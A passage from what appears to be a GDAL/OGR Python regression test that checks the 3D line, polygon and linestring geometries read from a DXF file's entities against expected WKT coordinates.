# -0.65792281055334 -1.01695262853705 -4.66238297837069,-0.604495233410736 -1.00655731075703 -4.53383326312274,-0.543250716774252 -1.00100194589848 -4.40851030024419,-0.474487637772662 -1.00031359914059 -4.28702465061277,-0.398541003214825 -1.00449562403956 -4.16996818010179,-0.315780817470174 -1.01352764619045 -4.0579111760691,-0.226610279844633 -1.02736566248926 -3.95139956897441,-0.131463820234124 -1.04594225551155 -3.85095227266099,-0.03080498262578 -1.06916692196344 -3.75705865625955,0.074875833241763 -1.09692651360451 -3.67017616003104,0.185063761056595 -1.12908578849468 -3.59072806676368,0.299221976310455 -1.1654880698793 -3.51910143958179,0.416794311653771 -1.20595600950263 -3.45564523621311,0.537207966487078 -1.25029245163064 -3.40066860890185,0.659876297587969 -1.29828139357396 -3.35443939825005,0.784201677177895 -1.34968903803128 -3.31718282832505,0.909578404504639 -1.40426493212629 -3.28908040939052,1.03539565675549 -1.4617431875889 -3.27026905360665,1.16104046492459 -1.52184377613619 -3.26084040800793,1.2859007001363 -1.58427389374204 -3.26084040800793,1.40936805587559 -1.64872938714895 -3.27026905360665,1.53084101159619 -1.71489623567206 -3.28908040939052,1.64972776326824 -1.78245208107646 -3.31718282832505,1.76544910658805 -1.851067798074 -3.35443939825005,1.87744125880325 -1.92040909778872 -3.40066860890185,1.98515860540564 -1.99013815637856 -3.45564523621311,2.08807635831029 -2.05991526087922 -3.51910143958179,2.1856931125703 -2.12940046425153 -3.59072806676368,2.27753328917133 -2.1982552415693 -3.67017616003104,2.36314945200472 -2.26614413927869 -3.75705865625955,2.44212448773124 -2.33273640949423 -3.85095227266099,2.51407363791538 -2.39770762136926 -3.95139956897441,2.57864637352974 -2.46074124169041 -4.0579111760691,2.63552810269725 -2.52153017699559 -4.16996818010179,2.68444170335113 -2.57977826970249 -4.28702465061277,2.72514887334576 -2.63520174095849 -4.40851030024419,2.75745129144082 -2.68753057318281 -4.53383326312274,2.78119158350236 
-2.7365098255649 -4.66238297837069,2.79625408921383 -2.78190087611056 -4.79353316469713,2.80256542556148 -2.82348258418421 -4.92664487157744,2.80009484434904 -2.86105236788389 -5.06106959215606,2.78885438199983 -2.89442719099992 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.78885438199983 -2.89442719099992 -5.19615242270663,2.76889880091653 -2.9234444547489 -5.33123525325721,2.74032532268425 -2.94796278993866 -5.46565997383582,2.70327315441675 -2.96786274570473 -5.59877168071614,2.65792281055334 -2.98304737146295 -5.72992186704258,2.60449523341074 -2.99344268924297 -5.85847158229053,2.54325071677425 -2.99899805410152 -5.98379454516908,2.47448763777266 -2.99968640085941 -6.1052801948005,2.39854100321483 -2.99550437596044 -6.22233666531148,2.31578081747018 -2.98647235380955 -6.33439366934417,2.22661027984464 -2.97263433751074 -6.44090527643885,2.13146382023413 -2.95405774448845 -6.54135257275227,2.03080498262578 -2.93083307803656 -6.63524618915372,1.92512416675824 -2.90307348639549 -6.72212868538223,1.81493623894341 -2.87091421150532 -6.80157677864958,1.70077802368955 -2.8345119301207 -6.87320340583148,1.58320568834623 -2.79404399049737 -6.93665960920016,1.46279203351292 -2.74970754836936 -6.99163623651142,1.34012370241203 -2.70171860642604 -7.03786544716322,1.21579832282211 -2.65031096196872 -7.07512201708822,1.09042159549536 -2.59573506787371 -7.10322443602275,0.964604343244512 -2.5382568124111 -7.12203579180661,0.838959535075416 -2.47815622386382 -7.13146443740534,0.714099299863701 -2.41572610625796 -7.13146443740534,0.590631944124412 -2.35127061285105 -7.12203579180661,0.469158988403815 -2.28510376432794 -7.10322443602275,0.350272236731764 -2.21754791892355 -7.07512201708822,0.234550893411949 -2.148932201926 -7.03786544716322,0.122558741196756 -2.07959090221128 -6.99163623651142,0.014841394594365 -2.00986184362144 -6.93665960920016,-0.088076358310285 -1.94008473912078 -6.87320340583148,-0.185693112570302 -1.87059953574847 -6.80157677864958,-0.277533289171331 -1.8017447584307 -6.72212868538223,-0.363149452004714 -1.73385586072131 -6.63524618915372,-0.442124487731234 -1.66726359050577 -6.54135257275227,-0.514073637915374 -1.60229237863074 -6.44090527643885,-0.57864637352974 
-1.53925875830959 -6.33439366934417,-0.635528102697248 -1.47846982300441 -6.22233666531148,-0.684441703351125 -1.42022173029752 -6.1052801948005,-0.725148873345763 -1.36479825904151 -5.98379454516908,-0.757451291440819 -1.31246942681719 -5.85847158229053,-0.781191583502361 -1.2634901744351 -5.72992186704258,-0.796254089213832 -1.21809912388944 -5.59877168071614,-0.802565425561482 -1.1765174158158 -5.46565997383582,-0.80009484434904 -1.13894763211612 -5.33123525325721,-0.788854381999831 -1.10557280900008 -5.19615242270663,-0.768898800916532 -1.0765555452511 -5.06106959215606,-0.740325322684253 -1.05203721006134 -4.92664487157745,-0.703273154416746 -1.03213725429527 -4.79353316469713,-0.65792281055334 -1.01695262853705 -4.66238297837069,-0.604495233410736 -1.00655731075703 -4.53383326312274,-0.543250716774252 -1.00100194589848 -4.40851030024419,-0.474487637772662 -1.00031359914059 -4.28702465061277,-0.398541003214825 -1.00449562403956 -4.16996818010179,-0.315780817470174 -1.01352764619045 -4.0579111760691,' +\
'-0.226610279844633 -1.02736566248926 -3.95139956897441,-0.131463820234124 -1.04594225551155 -3.85095227266099,-0.03080498262578 -1.06916692196344 -3.75705865625955,0.074875833241763 -1.09692651360451 -3.67017616003104,0.185063761056595 -1.12908578849468 -3.59072806676368,0.299221976310455 -1.1654880698793 -3.51910143958179,0.416794311653771 -1.20595600950263 -3.45564523621311,0.537207966487078 -1.25029245163064 -3.40066860890185,0.659876297587969 -1.29828139357396 -3.35443939825005,0.784201677177895 -1.34968903803128 -3.31718282832505,0.909578404504639 -1.40426493212629 -3.28908040939052,1.03539565675549 -1.4617431875889 -3.27026905360665,1.16104046492459 -1.52184377613619 -3.26084040800793,1.2859007001363 -1.58427389374204 -3.26084040800793,1.40936805587559 -1.64872938714895 -3.27026905360665,1.53084101159619 -1.71489623567206 -3.28908040939052,1.64972776326824 -1.78245208107646 -3.31718282832505,1.76544910658805 -1.851067798074 -3.35443939825005,1.87744125880325 -1.92040909778872 -3.40066860890185,1.98515860540564 -1.99013815637856 -3.45564523621311,2.08807635831029 -2.05991526087922 -3.51910143958179,2.1856931125703 -2.12940046425153 -3.59072806676368,2.27753328917133 -2.1982552415693 -3.67017616003104,2.36314945200472 -2.26614413927869 -3.75705865625955,2.44212448773124 -2.33273640949423 -3.85095227266099,2.51407363791538 -2.39770762136926 -3.95139956897441,2.57864637352974 -2.46074124169041 -4.0579111760691,2.63552810269725 -2.52153017699559 -4.16996818010179,2.68444170335113 -2.57977826970249 -4.28702465061277,2.72514887334576 -2.63520174095849 -4.40851030024419,2.75745129144082 -2.68753057318281 -4.53383326312274,2.78119158350236 -2.7365098255649 -4.66238297837069,2.79625408921383 -2.78190087611056 -4.79353316469713,2.80256542556148 -2.82348258418421 -4.92664487157744,2.80009484434904 -2.86105236788389 -5.06106959215606,2.78885438199983 -2.89442719099992 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):39
# EntityHandle (String) = 1E8
# LINESTRING Z (2.0 -2.0 -3.46410161513775,1.0 -2.0 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.0 -2.0 -3.46410161513775,1.0 -2.0 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):40
# EntityHandle (String) = 1E9
# LINESTRING Z (1.0 -2.0 -5.19615242270663,0.0 -2.0 -6.92820323027551)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1.0 -2.0 -5.19615242270663,0.0 -2.0 -6.92820323027551)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):41
# EntityHandle (String) = 1EA
# LINESTRING Z (0.25 -1.5 -4.76313972081441,1.0 -2.0 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0.25 -1.5 -4.76313972081441,1.0 -2.0 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):42
# EntityHandle (String) = 1EB
# LINESTRING Z (1.0 -2.0 -5.19615242270663,1.75 -2.5 -5.62916512459885)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1.0 -2.0 -5.19615242270663,1.75 -2.5 -5.62916512459885)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):43
# EntityHandle (String) = 1EC
# LINESTRING Z (2.0 -2.0 -3.46410161513775,2.04988140556792 -2.03487823687206 -3.49852624302284,2.09464789446162 -2.06958655048003 -3.54122153501056,2.13408136884713 -2.10395584540888 -3.59197948393006,2.16798971280107 -2.1378186779085 -3.65055280215638,2.19620772828016 -2.17101007166283 -3.7166561263709,2.21859793994945 -2.2033683215379 -3.78996740782271,2.23505126494835 -2.23473578139294 -3.87012948131781,2.24548754433133 -2.2649596321166 -3.956751805292,2.2498559335943 -2.29389262614624 -4.04941236449012,2.24813515038388 -2.32139380484327 -4.14765972598196,2.2403335781829 -2.3473291852295 -4.25101523849813,2.2264892254669 -2.3715724127387 -4.35897536437091,2.2066695405307 -2.39400537680336 -4.47101413271915,2.18097108288703 -2.41451878627752 -4.58658570192556,2.14951905283833 -2.43301270189222 -4.70512701892219,2.11246668151345 -2.44939702314958 -4.82606056232836,2.069994484341 -2.46359192728339 -4.94879715607678,2.02230938159631 -2.47552825814758 -5.07273883982016,1.96964369030667 -2.485147863138 -5.19728178213388,1.91225399242609 -2.4924038765061 -5.32181922232198,1.85041988479386 -2.49726094768414 -5.44574442649435,1.78444261696682 -2.49969541350955 -5.56845364351315,1.71464362356182 -2.49969541350955 -5.68934904640778,1.64136295825855 -2.49726094768414 -5.80784164492769,1.56495763709223 -2.4924038765061 -5.92335415504372,1.48579989910733 -2.485147863138 -6.03532381141787,1.40427539284642 -2.47552825814758 -6.14320510913943,1.32078129750918 -2.46359192728339 -6.24647246137009,1.2357243879353 -2.44939702314958 -6.34462275995019,1.14951905283833 -2.43301270189222 -6.43717782649107,1.06258527594554 -2.41451878627752 -6.52368674201215,0.975346589879385 -2.39400537680336 -6.60372804377285,0.888228012749189 -2.3715724127387 -6.67691177859673,0.801653977505599 -2.3473291852295 -6.74288140268412,0.716046264145928 -2.32139380484327 -6.80131551865772,0.631821944844409 -2.29389262614623 -6.85192944137827,0.549391352018479 -2.2649596321166 
-6.89447658490197,0.469156079230493 -2.23473578139294 -6.92874966382241,0.391507024664251 -2.2033683215379 -6.9545817031442,0.316822486708345 -2.17101007166283 -6.97184685176839,0.245466320924432 -2.1378186779085 -6.98046099562637,0.177786167379516 -2.10395584540888 -6.98038216747516,0.114111756978481 -2.06958655048003 -6.97161075135758,0.054753305048271 -2.03487823687206 -6.95418948073126,0.0 -2.0 -6.92820323027551,-0.049881405567917 -1.96512176312794 -6.89377860239042,-0.094647894461618 -1.93041344951997 -6.8510833104027,-0.134081368847123 -1.89604415459112 -6.8003253614832,-0.167989712801067 -1.8621813220915 -6.74175204325688,-0.196207728280158 -1.82898992833716 -6.67564871904237,-0.218597939949449 -1.7966316784621 -6.60233743759055,-0.235051264948343 -1.76526421860705 -6.52217536409545,
#-0.245487544331328 -1.7350403678834 -6.43555304012126,-0.2498559335943 -1.70610737385376 -6.34289248092314,-0.248135150383881 -1.67860619515673 -6.2446451194313,-0.240333578182897 -1.6526708147705 -6.14128960691513,-0.226489225466902 -1.6284275872613 -6.03332948104236,-0.206669540530698 -1.60599462319664 -5.92129071269411,-0.180971082887026 -1.58548121372248 -5.8057191434877,-0.149519052838327 -1.56698729810778 -5.68717782649107,-0.112466681513451 -1.55060297685042 -5.5662442830849,-0.069994484341001 -1.5364080727166 -5.44350768933648,-0.022309381596311 -1.52447174185242 -5.3195660055931,0.030356309693336 -1.514852136862 -5.19502306327939,0.087746007573915 -1.50759612349389 -5.07048562309128,0.149580115206143 -1.50273905231586 -4.94656041891892,0.215557383033179 -1.50030458649045 -4.82385120190011,0.28535637643818 -1.50030458649045 -4.70295579900548,0.35863704174145 -1.50273905231586 -4.58446320048557,0.435042362907775 -1.50759612349389 -4.46895069036954,0.514200100892672 -1.514852136862 -4.35698103399539,0.595724607153583 -1.52447174185242 -4.24909973627383,0.679218702490823 -1.5364080727166 -4.14583238404317,0.764275612064703 -1.55060297685042 -4.04768208546307,0.850480947161672 -1.56698729810778 -3.95512701892219,0.937414724054466 -1.58548121372248 -3.86861810340111,1.02465341012062 -1.60599462319664 -3.78857680164041,1.11177198725081 -1.6284275872613 -3.71539306681653,1.1983460224944 -1.6526708147705 -3.64942344272914,1.28395373585407 -1.67860619515673 -3.59098932675554,1.36817805515559 -1.70610737385376 -3.54037540403499,1.45060864798152 -1.7350403678834 -3.49782826051129,1.53084392076951 -1.76526421860705 -3.46355518159085,1.60849297533575 -1.7966316784621 -3.43772314226906,1.68317751329166 -1.82898992833716 -3.42045799364487,1.75453367907557 -1.8621813220915 -3.41184384978689,1.82221383262049 -1.89604415459112 -3.4119226779381,1.88588824302152 -1.93041344951997 -3.42069409405568,1.94524669495173 -1.96512176312794 -3.438115364682,2.0 -2.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.0 -2.0 -3.46410161513775,2.04988140556792 -2.03487823687206 -3.49852624302284,2.09464789446162 -2.06958655048003 -3.54122153501056,2.13408136884713 -2.10395584540888 -3.59197948393006,2.16798971280107 -2.1378186779085 -3.65055280215638,2.19620772828016 -2.17101007166283 -3.7166561263709,2.21859793994945 -2.2033683215379 -3.78996740782271,2.23505126494835 -2.23473578139294 -3.87012948131781,2.24548754433133 -2.2649596321166 -3.956751805292,2.2498559335943 -2.29389262614624 -4.04941236449012,2.24813515038388 -2.32139380484327 -4.14765972598196,2.2403335781829 -2.3473291852295 -4.25101523849813,2.2264892254669 -2.3715724127387 -4.35897536437091,2.2066695405307 -2.39400537680336 -4.47101413271915,2.18097108288703 -2.41451878627752 -4.58658570192556,2.14951905283833 -2.43301270189222 -4.70512701892219,2.11246668151345 -2.44939702314958 -4.82606056232836,2.069994484341 -2.46359192728339 -4.94879715607678,2.02230938159631 -2.47552825814758 -5.07273883982016,1.96964369030667 -2.485147863138 -5.19728178213388,1.91225399242609 -2.4924038765061 -5.32181922232198,1.85041988479386 -2.49726094768414 -5.44574442649435,1.78444261696682 -2.49969541350955 -5.56845364351315,1.71464362356182 -2.49969541350955 -5.68934904640778,1.64136295825855 -2.49726094768414 -5.80784164492769,1.56495763709223 -2.4924038765061 -5.92335415504372,1.48579989910733 -2.485147863138 -6.03532381141787,1.40427539284642 -2.47552825814758 -6.14320510913943,1.32078129750918 -2.46359192728339 -6.24647246137009,1.2357243879353 -2.44939702314958 -6.34462275995019,1.14951905283833 -2.43301270189222 -6.43717782649107,1.06258527594554 -2.41451878627752 -6.52368674201215,0.975346589879385 -2.39400537680336 -6.60372804377285,0.888228012749189 -2.3715724127387 -6.67691177859673,0.801653977505599 -2.3473291852295 -6.74288140268412,0.716046264145928 -2.32139380484327 -6.80131551865772,0.631821944844409 -2.29389262614623 -6.85192944137827,0.549391352018479 
-2.2649596321166 -6.89447658490197,0.469156079230493 -2.23473578139294 -6.92874966382241,0.391507024664251 -2.2033683215379 -6.9545817031442,0.316822486708345 -2.17101007166283 -6.97184685176839,0.245466320924432 -2.1378186779085 -6.98046099562637,0.177786167379516 -2.10395584540888 -6.98038216747516,0.114111756978481 -2.06958655048003 -6.97161075135758,0.054753305048271 -2.03487823687206 -6.95418948073126,0.0 -2.0 -6.92820323027551,-0.049881405567917 -1.96512176312794 -6.89377860239042,-0.094647894461618 -1.93041344951997 -6.8510833104027,-0.134081368847123 -1.89604415459112 -6.8003253614832,-0.167989712801067 -1.8621813220915 -6.74175204325688,-0.196207728280158 -1.82898992833716 -6.67564871904237,-0.218597939949449 -1.7966316784621 -6.60233743759055,' + \
'-0.235051264948343 -1.76526421860705 -6.52217536409545,-0.245487544331328 -1.7350403678834 -6.43555304012126,-0.2498559335943 -1.70610737385376 -6.34289248092314,-0.248135150383881 -1.67860619515673 -6.2446451194313,-0.240333578182897 -1.6526708147705 -6.14128960691513,-0.226489225466902 -1.6284275872613 -6.03332948104236,-0.206669540530698 -1.60599462319664 -5.92129071269411,-0.180971082887026 -1.58548121372248 -5.8057191434877,-0.149519052838327 -1.56698729810778 -5.68717782649107,-0.112466681513451 -1.55060297685042 -5.5662442830849,-0.069994484341001 -1.5364080727166 -5.44350768933648,-0.022309381596311 -1.52447174185242 -5.3195660055931,0.030356309693336 -1.514852136862 -5.19502306327939,0.087746007573915 -1.50759612349389 -5.07048562309128,0.149580115206143 -1.50273905231586 -4.94656041891892,0.215557383033179 -1.50030458649045 -4.82385120190011,0.28535637643818 -1.50030458649045 -4.70295579900548,0.35863704174145 -1.50273905231586 -4.58446320048557,0.435042362907775 -1.50759612349389 -4.46895069036954,0.514200100892672 -1.514852136862 -4.35698103399539,0.595724607153583 -1.52447174185242 -4.24909973627383,0.679218702490823 -1.5364080727166 -4.14583238404317,0.764275612064703 -1.55060297685042 -4.04768208546307,0.850480947161672 -1.56698729810778 -3.95512701892219,0.937414724054466 -1.58548121372248 -3.86861810340111,1.02465341012062 -1.60599462319664 -3.78857680164041,1.11177198725081 -1.6284275872613 -3.71539306681653,1.1983460224944 -1.6526708147705 -3.64942344272914,1.28395373585407 -1.67860619515673 -3.59098932675554,1.36817805515559 -1.70610737385376 -3.54037540403499,1.45060864798152 -1.7350403678834 -3.49782826051129,1.53084392076951 -1.76526421860705 -3.46355518159085,1.60849297533575 -1.7966316784621 -3.43772314226906,1.68317751329166 -1.82898992833716 -3.42045799364487,1.75453367907557 -1.8621813220915 -3.41184384978689,1.82221383262049 -1.89604415459112 -3.4119226779381,1.88588824302152 -1.93041344951997 -3.42069409405568,1.94524669495173 
-1.96512176312794 -3.438115364682,2.0 -2.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):44
# EntityHandle (String) = 1ED
# LINESTRING Z (0.5 -1.0 -2.59807621135332,0.543577773425908 -1.01791116395762 -2.58464338569351,0.587546417985528 -1.03693648101917 -2.57439309093773,0.631694860183701 -1.05698461927736 -2.56737453409618,0.675811163398452 -1.07795933672482 -2.56362140807291,0.719683545292469 -1.09975994326827 -2.56315172992158,0.763101394483934 -1.12228178409597 -2.5659677543537,0.805856281596113 -1.14541674207787 -2.57205596291479,0.847742959832148 -1.16905375678694 -2.58138712888039,0.888560350271717 -1.19307935764976 -2.59391645756022,0.928112507159618 -1.21737820866727 -2.60958380133721,0.96620955855235 -1.24183366209053 -2.62831394840886,1.00266861780709 -1.26632831839353 -2.65001698384495,1.03731466153743 -1.29074458985506 -2.67458872122829,1.06998136982112 -1.31496526504393 -2.7019112028064,1.10051192462654 -1.33887407149783 -2.73185326575312,1.12875976262485 -1.36235623389463 -2.76427117182176,1.15458927877392 -1.38529902503655 -2.79900929736714,1.17787647729662 -1.40759230700227 -2.83590088042404,1.19850956692819 -1.42912905986906 -2.8747688212557,1.21638949757537 -1.44980589546683 -2.91542653252918,1.23143043581088 -1.46952355369781 -2.95767883503644,1.24356017692077 -1.48818737903916 -3.00132289466106,1.2527204915264 -1.50570777494116 -3.04614919609277,1.25886740511731 -1.52200063393958 -3.09194254861523,1.26197140915283 -1.53698774141742 -3.138483119139,1.2620176027192 -1.55059715107771 -3.18554748752036,1.25900576406208 -1.56276353032509 -3.23290971909991,1.25295035165112 -1.57342847389788 -3.28034244931235,1.24388043477135 -1.58254078424523 -3.32761797516041,1.23183955397484 -1.59005671730331 -3.37450934831362,1.21688551206218 -1.5959401924907 -3.42079146458413,1.19909009659756 -1.60016296591487 -3.46624214454969,1.17853873528923 -1.6027047659583 -3.51064320013621,1.15533008588991 -1.60355339059327 -3.55378148203954,1.12957556258567 -1.6027047659583 -3.59544990295855,1.10139880114707 -1.60016296591487 -3.63544843172717,1.07093506540992 -1.5959401924907 
-3.67358505357321,1.03833059793508 -1.59005671730331 -3.70967669189409,1.00374191796432 -1.58254078424523 -3.74355008712442,0.967335070042516 -1.57342847389788 -3.77504262847653,0.929284826913179 -1.56276353032509 -3.80400313456104,0.889773850513921 -1.55059715107771 -3.83029257913998,0.848991815099414 -1.53698774141741 -3.85378475852869,0.807134496701444 -1.52200063393958 -3.87436689744237,0.764402833297081 -1.50570777494116 -3.891940190379,0.72100196019671 -1.48818737903916 -3.90642027593972,0.677140225282558 -1.46952355369781 -3.91773764180954,0.633028188825132 -1.44980589546683 -3.92583795845446,0.588877612678977 -1.42912905986906 -3.93068233993284,0.544900443710183 -1.40759230700227 -3.93224753056917,0.501307796335731 -1.38529902503655 -3.93052601659399,0.458308939059047 -1.36235623389463 -3.92552606221412,0.416110289866958 -1.33887407149783 -3.91727166993992,0.374914425310669 -1.31496526504393 -3.90580246536015,0.334919108027743 -1.29074458985506 -3.89117350691752,0.296316337373485 -1.26632831839353 -3.87345502159809,0.259291427719229 -1.24183366209053 -3.85273206780345,0.224022118842197 -1.21737820866727 -3.82910412702388,0.190677722677547 -1.19307935764975 -3.80268462627299,0.159418310528662 -1.16905375678694 -3.77360039357605,0.13039394463751 -1.14541674207787 -3.7419910491263,0.103743957803975 -1.12228178409597 -3.70800833503176,0.079596284512354 -1.09975994326827 -3.67181538687033,0.058066846776 -1.07795933672482 -3.63358595054991,0.039258997648375 -1.05698461927736 -3.59350354823325,0.023263025071983 -1.03693648101917 -3.55176059733134,0.010155718446952 -1.01791116395762 -3.50855748679486,0.0 -1.0 -3.46410161513776)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0.5 -1.0 -2.59807621135332,0.543577773425908 -1.01791116395762 -2.58464338569351,0.587546417985528 -1.03693648101917 -2.57439309093773,0.631694860183701 -1.05698461927736 -2.56737453409618,0.675811163398452 -1.07795933672482 -2.56362140807291,0.719683545292469 -1.09975994326827 -2.56315172992158,0.763101394483934 -1.12228178409597 -2.5659677543537,0.805856281596113 -1.14541674207787 -2.57205596291479,0.847742959832148 -1.16905375678694 -2.58138712888039,0.888560350271717 -1.19307935764976 -2.59391645756022,0.928112507159618 -1.21737820866727 -2.60958380133721,0.96620955855235 -1.24183366209053 -2.62831394840886,1.00266861780709 -1.26632831839353 -2.65001698384495,1.03731466153743 -1.29074458985506 -2.67458872122829,1.06998136982112 -1.31496526504393 -2.7019112028064,1.10051192462654 -1.33887407149783 -2.73185326575312,1.12875976262485 -1.36235623389463 -2.76427117182176,1.15458927877392 -1.38529902503655 -2.79900929736714,1.17787647729662 -1.40759230700227 -2.83590088042404,1.19850956692819 -1.42912905986906 -2.8747688212557,1.21638949757537 -1.44980589546683 -2.91542653252918,1.23143043581088 -1.46952355369781 -2.95767883503644,1.24356017692077 -1.48818737903916 -3.00132289466106,1.2527204915264 -1.50570777494116 -3.04614919609277,1.25886740511731 -1.52200063393958 -3.09194254861523,1.26197140915283 -1.53698774141742 -3.138483119139,1.2620176027192 -1.55059715107771 -3.18554748752036,1.25900576406208 -1.56276353032509 -3.23290971909991,1.25295035165112 -1.57342847389788 -3.28034244931235,1.24388043477135 -1.58254078424523 -3.32761797516041,1.23183955397484 -1.59005671730331 -3.37450934831362,1.21688551206218 -1.5959401924907 -3.42079146458413,1.19909009659756 -1.60016296591487 -3.46624214454969,1.17853873528923 -1.6027047659583 -3.51064320013621,1.15533008588991 -1.60355339059327 -3.55378148203954,1.12957556258567 -1.6027047659583 -3.59544990295855,1.10139880114707 -1.60016296591487 
-3.63544843172717,1.07093506540992 -1.5959401924907 -3.67358505357321,1.03833059793508 -1.59005671730331 -3.70967669189409,1.00374191796432 -1.58254078424523 -3.74355008712442,0.967335070042516 -1.57342847389788 -3.77504262847653,0.929284826913179 -1.56276353032509 -3.80400313456104,0.889773850513921 -1.55059715107771 -3.83029257913998,0.848991815099414 -1.53698774141741 -3.85378475852869,0.807134496701444 -1.52200063393958 -3.87436689744237,0.764402833297081 -1.50570777494116 -3.891940190379,0.72100196019671 -1.48818737903916 -3.90642027593972,0.677140225282558 -1.46952355369781 -3.91773764180954,0.633028188825132 -1.44980589546683 -3.92583795845446,0.588877612678977 -1.42912905986906 -3.93068233993284,0.544900443710183 -1.40759230700227 -3.93224753056917,0.501307796335731 -1.38529902503655 -3.93052601659399,0.458308939059047 -1.36235623389463 -3.92552606221412,0.416110289866958 -1.33887407149783 -3.91727166993992,0.374914425310669 -1.31496526504393 -3.90580246536015,0.334919108027743 -1.29074458985506 -3.89117350691752,0.296316337373485 -1.26632831839353 -3.87345502159809,0.259291427719229 -1.24183366209053 -3.85273206780345,0.224022118842197 -1.21737820866727 -3.82910412702388,0.190677722677547 -1.19307935764975 -3.80268462627299,0.159418310528662 -1.16905375678694 -3.77360039357605,0.13039394463751 -1.14541674207787 -3.7419910491263,0.103743957803975 -1.12228178409597 -3.70800833503176,0.079596284512354 -1.09975994326827 -3.67181538687033,0.058066846776 -1.07795933672482 -3.63358595054991,0.039258997648375 -1.05698461927736 -3.59350354823325,0.023263025071983 -1.03693648101917 -3.55176059733134,0.010155718446952 -1.01791116395762 -3.50855748679486,0.0 -1.0 -3.46410161513776)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):45
# EntityHandle (String) = 1EE
# POLYGON Z ((1 -1 -1.73205080756888,1.75 -1.5 -2.1650635094611,1.25 -1.5 -3.03108891324553,0.5 -1.0 -2.59807621135332,1 -1 -1.73205080756888))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1 -1 -1.73205080756888,1.75 -1.5 -2.1650635094611,1.25 -1.5 -3.03108891324553,0.5 -1.0 -2.59807621135332,1 -1 -1.73205080756888))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):46
# EntityHandle (String) = 1EF
# POLYGON Z ((1.5 -2.0 -4.33012701892219,1.0 -2.0 -5.19615242270663,0.25 -1.5 -4.76313972081441,0.75 -1.5 -3.89711431702997,1.5 -2.0 -4.33012701892219))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1.5 -2.0 -4.33012701892219,1.0 -2.0 -5.19615242270663,0.25 -1.5 -4.76313972081441,0.75 -1.5 -3.89711431702997,1.5 -2.0 -4.33012701892219))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):47
# EntityHandle (String) = 1F1
# POLYGON Z ((2.0 -4.0 -10.3923048454133,1.5 -4.0 -11.2583302491977,2.25 -4.5 -11.6913429510899,2.75 -4.5 -10.8253175473055,2.0 -4.0 -10.3923048454133))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((2.0 -4.0 -10.3923048454133,1.5 -4.0 -11.2583302491977,2.25 -4.5 -11.6913429510899,2.75 -4.5 -10.8253175473055,2.0 -4.0 -10.3923048454133))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):48
# EntityHandle (String) = 1F2
# LINESTRING (0.5 -1.0,0.53846153846154 -1.07692307692308,0.576923076923078 -1.15384615384615,0.615384615384617 -1.23076923076923,0.653846153846155 -1.30769230769231,0.692307692307694 -1.38461538461538,0.730769230769232 -1.46153846153846,0.769230769230771 -1.53846153846154,0.807692307692309 -1.61538461538462,0.846153846153848 -1.69230769230769,0.884615384615386 -1.76923076923077,0.923076923076924 -1.84615384615385,0.961538461538463 -1.92307692307692,1.0 -2.0,1.03846153846154 -2.07692307692308,1.07692307692308 -2.15384615384615,1.11538461538462 -2.23076923076923,1.15384615384616 -2.30769230769231,1.19230769230769 -2.38461538461538,1.23076923076923 -2.46153846153846,1.26923076923077 -2.53846153846154,1.30769230769231 -2.61538461538461,1.34615384615385 -2.69230769230769,1.38461538461539 -2.76923076923077,1.42307692307693 -2.84615384615385,1.46153846153846 -2.92307692307692,1.5 -3.0,1.53846153846154 -3.07692307692308,1.57692307692308 -3.15384615384615,1.61538461538462 -3.23076923076923,1.65384615384616 -3.30769230769231,1.6923076923077 -3.38461538461539,1.73076923076923 -3.46153846153846,1.76923076923077 -3.53846153846154,1.80769230769231 -3.61538461538461,1.84615384615385 -3.69230769230769,1.88461538461539 -3.76923076923077,1.92307692307693 -3.84615384615385,1.96153846153847 -3.92307692307692,2.0 -4.0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (0.5 -1.0,0.53846153846154 -1.07692307692308,0.576923076923078 -1.15384615384615,0.615384615384617 -1.23076923076923,0.653846153846155 -1.30769230769231,0.692307692307694 -1.38461538461538,0.730769230769232 -1.46153846153846,0.769230769230771 -1.53846153846154,0.807692307692309 -1.61538461538462,0.846153846153848 -1.69230769230769,0.884615384615386 -1.76923076923077,0.923076923076924 -1.84615384615385,0.961538461538463 -1.92307692307692,1.0 -2.0,1.03846153846154 -2.07692307692308,1.07692307692308 -2.15384615384615,1.11538461538462 -2.23076923076923,1.15384615384616 -2.30769230769231,1.19230769230769 -2.38461538461538,1.23076923076923 -2.46153846153846,1.26923076923077 -2.53846153846154,1.30769230769231 -2.61538461538461,1.34615384615385 -2.69230769230769,1.38461538461539 -2.76923076923077,1.42307692307693 -2.84615384615385,1.46153846153846 -2.92307692307692,1.5 -3.0,1.53846153846154 -3.07692307692308,1.57692307692308 -3.15384615384615,1.61538461538462 -3.23076923076923,1.65384615384616 -3.30769230769231,1.6923076923077 -3.38461538461539,1.73076923076923 -3.46153846153846,1.76923076923077 -3.53846153846154,1.80769230769231 -3.61538461538461,1.84615384615385 -3.69230769230769,1.88461538461539 -3.76923076923077,1.92307692307693 -3.84615384615385,1.96153846153847 -3.92307692307692,2.0 -4.0)'):
